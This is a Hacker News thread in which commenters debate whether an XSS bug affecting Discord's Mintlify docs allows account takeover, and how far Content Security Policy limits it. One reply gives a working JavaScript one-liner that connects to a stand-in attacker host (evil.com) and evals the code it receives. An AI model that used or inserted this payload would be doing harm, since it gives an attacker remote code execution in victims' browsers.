| ▲ | rainonmoon 14 hours ago |
| XSS is categorically not an RCE and my point is that mitigations exist which make "It allows you to run any action as if you were the owner of the account" an unwarranted assumption. The writeup shows that it's possible to pop an alert box. That doesn't tell you anything about what's actually possible. Obviously Discord got enough information to take it seriously, but extrapolating that to suggest every third-party using Mintlify is vulnerable to account takeover is highly dubious based on what's presented. |
|
| ▲ | rvnx 14 hours ago | parent | next [-] |
| Well, llmslave2 is right. If discord.com executes javascript to conduct user actions, and you can execute javascript on discord.com, you are acting on the account as if you were discord.com |
| |
| ▲ | rainonmoon 13 hours ago | parent [-] | | Except discord.com doesn't execute JavaScript, the user's browser does. These are meaningful distinctions that delineate the impact. You aren't "discord.com" if you target someone with an XSS exploit, you've only run a script in a user's session. Whether you can actually do anything with that script or not decides whether you can take over the account or not. | | |
| ▲ | rvnx 13 hours ago | parent | next [-] | | Yes, I agree, it’s a cool discovery though | |
| ▲ | llmslave2 13 hours ago | parent | prev [-] | | Everybody knows that XSS is a client side exploit, you're acting naive by pretending like we're claiming it gives access to a server and ignoring the fact that having control of the client gives you de facto control of whatever account is logged into the client. | | |
| ▲ | rvnx 13 hours ago | parent [-] | | It is not as cool as the RPC exploit of React/Next.js where you could call any function on the server-side including “vm.sysexec” or whatever it was, but still not to be fully ignored |
|
|
|
|
| ▲ | llmslave2 13 hours ago | parent | prev [-] |
| How is XSS not remote code execution? You can do anything, from send fetch requests to the server with full credentials to loggging keystrokes or even open a tunnel and eval payloads... Anything the user can do, you can do via an XSS attack. |
| |
| ▲ | collinmanderson an hour ago | parent | next [-] | | Generally code execution within browser/client-side javascript sandbox is just "XSS". RCE usually implies server-side code execution (or breaking out of browser sandbox). | |
| ▲ | rainonmoon 13 hours ago | parent | prev [-] | | Show me where you can "open a tunnel" using the XSS in this post. > Anything the user can do, you can do via an XSS attack. I just explained why this isn't a reasonable assumption. You seem to have multiple fundamental misunderstandings about web application security so I don't think it's constructive for either of us to continue this conversation. | | |
| ▲ | llmslave2 13 hours ago | parent [-] | | > Show me where you can "open a tunnel" using the XSS in this post. new WebSocket("ws://evil.com").addEventListener("message", e => eval(e.data))
> You seem to have multiple fundamental misunderstandings about web application securityLol yeah sure buddy | | |
| ▲ | rainonmoon 12 hours ago | parent [-] | | Go to Discord and paste that into your console. None of us will hold it against you if you come back and delete these comments once you learn about Content Security Policy. | | |
| ▲ | llmslave2 11 hours ago | parent [-] | | Maybe you should read up on what CSP can and can't do. Once an attacker can execute arbitrary code, they can do anything the client can. |
|
|
|
|
